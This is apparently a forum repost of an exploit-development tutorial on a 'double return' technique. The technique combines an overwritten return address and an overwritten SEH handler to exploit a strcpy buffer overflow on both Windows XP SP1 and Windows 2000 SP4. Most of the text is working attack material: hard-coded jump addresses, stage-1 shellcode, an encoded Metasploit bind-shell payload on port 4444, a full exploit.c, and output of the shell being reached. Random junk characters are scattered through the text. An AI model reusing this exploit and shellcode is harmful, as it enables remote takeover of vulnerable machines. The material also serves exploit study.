The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.# ?2 d9 _# t6 `# @
' a& M# z+ y( O F$ H
[Buf] <- Shellcode / E3 [0 g* B6 R[Return Address] <- jmp register (for Windows XP sp1)- D( a- o. h- h) C/ [8 o1 H* [( R
[Various Stack Data] <- Junk $ X$ \: j6 J2 ~) K' V( G0 w[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward" t( B; X5 W& i6 s. Z, S3 D* e* q
[SE Handler] <- jmp register (for Win2k sp4)- x; r) l# J2 |8 L
[Stage1 Shellcode] <- stage1 shellcode for win2k4 O1 T. X9 }9 k3 I$ U
# ^3 E* X C! `: z f3 t
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses/ h0 s8 q/ g( A! ^0 e+ y
- Y" O& \5 M# s* `, g+ v6 |Necessary Tools: - T" ^6 p o* ?3 M- OllyDBG $ O2 K) W& T; T3 V* p( e' K- C/C++ Compiler 5 u& x7 k) `1 {" `% D; G9 z- nasm - I$ t. a0 T/ p- U0 q8 O2 S- Sac + g+ P) M+ G7 v* y# M( Q8 C4 `# r" }2 N; Y( q" r6 d
Vulnerable Code: 2 H: U! ?; W1 m+ Z6 Z. j+ @0 t- }//lamebuf.c. Z6 K1 G$ C& ?$ D) ~" Z
#include<stdio.h>- c0 V* W b- a, V% C" s* q
#include<string.h>4 Q2 L, A) `( [( ^0 F! l+ I, X* W ?
#include<windows.h>* \& I8 W% o+ x E% Y1 |3 W
int main(int argc,char *argv[]){3 L" s0 K7 v0 R8 A
5 z% W. N) m' t
char buf[512];: \! A6 ~" n+ ?' e' P/ n
char buf1[1024]; // <- simulate a stack" f" e4 {' _+ q
//DebugBreak(); 5 k+ v* d) K" W9 u' i6 I3 [# oif (argc != 2){ return -1; } 9 c- }! P4 v! E2 i" m& n; f0 T8 B; f2 K) m- N% v
strcpy(buf,argv[1]);$ e7 h, x) p# u
return 0x0; 4 ^7 E4 _2 v9 Y: f) p} ; m! `7 u M( @% P" l0 d _5 O6 B9 L5 i. R4 oGetting Started:! N- \# x; }# t: Q
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:* h% Y1 g6 z, C. t
1 }/ B5 _* V: o1 m! C
EAX 00000000 E9 _5 x! P4 N, O ?. L
ECX 00321404, M' z8 J7 a% K' h- b4 u) F
EDX 004141418 [9 J. t2 W& I# d: ?" K
EBX 7FFDF000- Q9 L3 h0 y/ |6 P- J8 u
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + \1 J S- N: A) X4 UEBP 41414141 1 Z; n; i6 y: d" vESI 77D4595F& f6 Y9 L4 l) ~
EDI 77F59037 ntdll.77F59037' @3 b, c, m+ J$ [1 O: H
EIP 41414141* ^2 T2 j2 B7 ?* i
1 O; d. N3 g: x, z6 r
Lets take a look at the stack and see what happened to the default exception handler: ! o* M$ z$ t- W8 }* e0x0012FFB0 41414141 Pointer to next SEH Record " W6 |0 \7 W4 a6 U2 B0x0012FFB4 41414141 SE Handler ) ]) W& Y3 }" q2 a: z4 q# i$ [1 d! q0 j$ P. c
We successfully overwrote the return address and the default exception handler. t( Y3 ? d7 P3 O) a5 k
) A8 |/ q+ w# O# l" ?" d0 v
Primary Return Address (Windows XP SP1 EN): $ U& m. V; p8 K1 A* o* H9 ?( jThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: 9 }0 G1 e. Q3 c, s3 z0 U"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4" 2 r$ T1 l" r1 A' U: X3 s, l5 Q! P& A; U
Secondary Return Address (Windows 2000 SP4 EN): P3 N% e1 p- |$ k! G) ?9 o
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:/ m2 M h/ R6 a& q' B5 c }
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"7 X1 B- O8 ?( ]
+ h/ Q- u+ g% b6 ] q3 C' j! o# mProof Of Concept: : x" ~. [0 V' Z4 j. r. u9 I, Q// exploit.c: t! p& g. U7 X* W8 P1 _
// Tal zeltzer - [Double Return] // , e$ w. `* D7 D. K6 u* ~ ! ]- p: u' H2 `#include<stdio.h> 1 e5 S# m& Z8 _8 x4 n#include<string.h> e( n; f* P3 K% O% Z
#include<windows.h> 0 P, y) h/ j; D$ K . N$ s$ D6 G" {3 q#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp 2 ]% X/ T7 R t6 k3 \#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx # W& e" r3 X& h$ Z+ o/ s* D8 a1 G/ S# n2 M; k
// Stage1 For WinXP Sp1 English' P( E3 g5 R. M
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";& B/ m/ `. r+ |+ j4 I2 D( L
( r& }% ?3 e8 _/ C6 {$ \// Stage1 For Win2k Sp4 English, {0 m6 |1 f1 J0 Q% r% K$ b
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";1 I2 d* l9 j l
8 t2 Z: H6 ?1 R) u6 v5 a// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com% R$ _1 D3 m; w1 S/ \% g( s
unsigned char shellcode[] =7 K) p6 |# j) K1 r
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"0 w. k0 C8 M6 \
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"2 q8 O5 ]; R! G6 ~5 m; }+ |; \! o2 C; p
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05") V9 i. d% Q3 [( s. K
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0" & D. Y$ J4 N, b/ x3 f" `7 W z"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"7 Q1 I+ m0 A$ z- b$ Z, ~2 X
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"' q) e1 @/ L: `7 Y/ c
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"8 W+ Q6 V3 q, F
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" 6 j+ D9 J, ]" f; v"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"' Q$ ?' ^! R, w u' `
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" . w2 ^& d8 ]9 ^+ d# Y4 Z! s"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"/ o/ z1 z. i% S8 @1 _9 U3 T8 c
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" : \4 M) d8 T, }+ ~2 c"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" 1 U9 N* F/ A M+ P/ l0 l9 n, ^"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" 5 T/ E; p6 C! [! G! B X"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" 7 k) M% T2 @( w6 r) r4 f1 E' `"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" / Q. o, m; f! B9 b- p+ i"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"2 d( T% F1 z' N
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"' w$ {1 p1 B# V( e. ?
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"! {, v/ \& T% i8 c0 V0 Y* u. b
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"% {$ J9 y/ u, i! ]
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"% ~; H) n$ ]- n
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" ! s* m, _" U' X1 C( q6 O"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" % P8 K# w9 m; f3 v" @"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" 7 u* N- b. l0 {. G" G# M* X"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";5 ^- l# t( X, @. p' f
1 a# F/ k1 y% x; ~4 e/ i9 [% v% z 9 A" @* H) q# [. kint main(int argc,char *argv[]){ 9 e* P: b5 Y8 j" w/ x3 `% d * z; ?0 g" ]& _% X h% rchar *bufExe[3];! h: H4 p/ u% b8 K/ d0 H$ y" b2 A
char buf[2048];+ U6 h" d- }# T& y$ J) |+ x
bufExe[0] = "lamebuf.exe"; * O% A6 B: J: z! r* \bufExe[2] = NULL;6 u7 F/ i. L3 ^) |" H1 L+ D
5 G0 ?4 C. _; X! d- u
memset(buf,0x0,sizeof(buf)); ; p0 j3 a5 d5 l C$ Zmemset(buf,0x90,1652); , |* S8 c% o7 g! E% r0 smemcpy(&buf[24],shellcode,sizeof(shellcode)-1); + Q3 k$ D6 _ t6 P3 }* a$ p4 g% i' q1 s. D( u$ l" R$ q
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode ; V' e/ ~6 F' L) v1 {6 `memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode 0 G& V y% @9 r3 {, }& e) H7 L/ A! ?! |( t* W+ Z, g! ?) h
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en 4 G( l* p0 Q! z3 E*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code ' t. \- a% {* D*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en ! m4 D) h! P. J. v4 Y " v7 _4 E" h; [' p3 W0 Q4 e3 D# s * z2 g4 Y* J; Q) a* w% n v; {8 WbufExe[1] = buf; % H; z2 R1 Z4 ?, W//Execute the vulnerable application / v) b0 r( X/ @5 h2 Y$ w# Z4 gexecve(bufExe[0],bufExe,NULL); 6 Z4 A! |# k/ @3 X) [) h E7 E* x8 c0 f3 @; }. W/ h! Z9 Q; E
return 0x0;; Q. N4 j2 h1 Z; m% ]2 D
} - B3 a. w# ?; z6 S* i * _2 g& E7 E' p* G: {Exploit under Windows XP SP1: , K- f% L$ v6 _8 |- AC:\>exploit 5 m$ Z) m+ y! v+ X/ K2 r# aC:\> ' R/ D I6 P T! l7 q; F; ^" mC:\>telnet 127.0.0.1 4444 + X, p8 u$ h7 o! t& v# C# {/ d3 T/ |. {" j$ t8 m
Microsoft Windows XP [Version 5.1.2600] / G: [# c* m7 R H(C) Copyright 1985-2001 Microsoft Corp. / a- \* k, ^7 e1 X$ ~' E / Q$ f B3 Y9 N) U z xC:\>* Q/ v& o: c' E% v9 n
5 k" E0 B8 h5 P9 s- q1 rExploit under Windows 2000 SP4: * D. s3 V! n7 }! s# i2 IC:\>exploit# R8 U. F6 D z- y
C:\>! k( V7 }; t4 ~! a8 [ U
C:\>telnet 127.0.0.1 4444 . c1 G3 A5 g& K/ Q. N' ]5 I. D+ E6 K3 P9 p
Microsoft Windows 2000 [Version 5.00.2195] ; w$ E8 x" q1 r: z! M(C) Copyright 1985-2000 Microsoft Corp.
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
